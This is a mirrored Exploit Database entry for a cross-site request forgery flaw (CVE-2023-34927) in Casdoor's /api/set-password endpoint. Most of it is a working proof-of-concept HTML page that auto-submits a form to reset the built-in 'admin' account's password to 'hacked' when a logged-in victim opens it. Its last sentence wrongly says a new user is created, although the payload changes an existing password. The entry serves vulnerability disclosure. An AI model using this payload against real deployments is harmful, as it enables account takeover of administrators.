Casdoor < v1.331.0 - '/api/set-password' CSRF

• Exploit Database
• 183 阅读

• 作者： Van Lam Nguyen
  日期： 2024-04-02
• 类别：

  • webapps
  平台：

  • go
• 来源：https://www.exploit-db.com/exploits/51961/

• # Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF
  # Application: Casdoor
  # Version: <= 1.331.0
  # Date: 03/07/2024
  # Exploit Author: Van Lam Nguyen 
  # Vendor Homepage: https://casdoor.org/
  # Software Link: https://github.com/casdoor/casdoor
  # Tested on: Windows
  # CVE : CVE-2023-34927
  
  Overview
  ==================================================
  Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password. 
  This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
  
  Proof of Concept
  ==================================================
  
  Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
  
  <html>
  <form action="http://localhost:8000/api/set-password" method="POST">
  <input name='userOwner' value='built&#45;in' type='hidden'>
  <input name='userName' value='admin' type='hidden'>
  <input name='newPassword' value='hacked' type='hidden'>
  <input type=submit>
  </form>
  <script>
  history.pushState('', '', '/');
  document.forms[0].submit();
  </script>
  
  </html>
  
  If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
  
  userOwner: built&#45;in
  userName: admin
  newPassword: hacked